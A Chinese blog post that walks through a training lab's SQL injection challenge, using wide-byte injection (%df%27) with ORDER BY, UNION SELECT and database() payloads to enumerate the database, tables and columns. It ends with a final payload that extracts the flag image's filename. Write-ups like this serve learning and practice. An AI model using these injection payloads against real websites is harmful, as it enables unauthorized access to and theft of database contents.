您的位置: 首页  >  文章  >  网络安全实验室注入关(邂逅wp)

网络安全实验室注入关(邂逅wp)

分类: 文章 2022-10-17 17:57:33

习惯性查看源码,看到
网络安全实验室注入关(邂逅wp)
以为用id注入,试了get和post,一点反应都没有(= =)
打开百度,大佬都说是图片宽字节注入
奇怪的是我怎么抓包都抓不到图片那个包,后来发现
网络安全实验室注入关(邂逅wp)
这里勾上了,我去
好了,进入正题
网络安全实验室注入关(邂逅wp)
这里加一个单引号是不会报错的,加了个%df才报错,宽字节无疑了
走个流程

orederby加查看回显位置

网络安全实验室注入关(邂逅wp)
%df%27order by 5%23
一直到5才报错,说明有4个字段
网络安全实验室注入关(邂逅wp)
%df%27union select 1,2,3,4%23
回显位置是3

暴库

网络安全实验室注入关(邂逅wp)
%df%27union select 1,2,database(),4%23
database()=mydbs

暴表

网络安全实验室注入关(邂逅wp)
这里有两个表,修改limit暴出来分别是
article pic

暴字段

看了答案发现flag在pic里面,我就不去article里浪费时间了
网络安全实验室注入关(邂逅wp)
上面查出来有四个字段,全部暴出来是
id picname data text

暴内容

网络安全实验室注入关(邂逅wp)
最终的payload是
%df%27and 1=2 union select 1,2,picname,4 from mydbs.pic limit 2,1;%23
查看一下这张图片
http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/flagishere_askldjfklasjdfl.jpg
网络安全实验室注入关(邂逅wp)

相关推荐